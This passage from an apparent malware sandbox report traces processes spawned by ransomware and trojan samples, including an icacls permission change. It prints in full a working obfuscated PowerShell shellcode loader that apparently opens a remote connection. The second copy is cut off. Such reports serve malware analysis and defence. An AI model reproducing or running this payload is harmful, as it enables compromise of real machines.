                                                                                                                              3⤵
                                                                                                                                PID:5740
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\MTK广告\MTK写串号工具.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\MTK广告\MTK写串号工具.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:5316
                                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Sodin.vho-9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1.exe
                                                                                                                                  HEUR-Trojan-Ransom.Win32.Sodin.vho-9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:5524
                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                    HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:300
                                                                                                                                      • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                        HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                        4⤵
                                                                                                                                          PID:6680
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\9821a98a-8879-4324-91f2-9c0f106d8af3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                            5⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:6776
                                                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                            "C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                            5⤵
                                                                                                                                              PID:8728
                                                                                                                                              • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe
                                                                                                                                                "C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Stop.gen-2b2e6aec3b42e0d63a4a79590121b15f4dd044cedcc558505dadd2b24f75f8a7.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                6⤵
                                                                                                                                                  PID:1564
                                                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-1168ac10887da9c3296428b2bc29b4b476fea0cd01e47c24edf56c685c42351b.exe
                                                                                                                                            HEUR-Trojan.MSIL.Crypt.gen-1168ac10887da9c3296428b2bc29b4b476fea0cd01e47c24edf56c685c42351b.exe
                                                                                                                                            3⤵
                                                                                                                                              PID:5332
                                                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-118bd4bc740ceb90ee746885aa223d084df5ea457db13a826ed426fc9bf3add8.exe
                                                                                                                                              HEUR-Trojan.MSIL.Crypt.gen-118bd4bc740ceb90ee746885aa223d084df5ea457db13a826ed426fc9bf3add8.exe
                                                                                                                                              3⤵
                                                                                                                                                PID:5508
                                                                                                                                              • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe
                                                                                                                                                HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe
                                                                                                                                                3⤵
                                                                                                                                                  PID:4840
                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-149284a3cea91f5e9664132845539885ea0f23d0dddf184180823a5b4236b6c9.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:8292
                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-5f6d7a3aca682bbd784869d31355655a2a40f9aaad08012f1bfbbec26c7fac15.exe
                                                                                                                                                    HEUR-Trojan.MSIL.Crypt.gen-5f6d7a3aca682bbd784869d31355655a2a40f9aaad08012f1bfbbec26c7fac15.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6040
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell /w 1 /C "sv xA -;sv Tnz ec;sv dg ((gv xA).value.toString()+(gv Tnz).value.toString());powershell (gv dg).value.toString() ('JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AF'+'sAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMAeQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA'+'==')"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:10144
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell /w 1 /C "sv xA -;sv Tnz ec;sv dg ((gv xA).value.toString()+(gv Tnz).value.toString());powershell (gv dg).value.toString() ('JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AF'+'sAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMA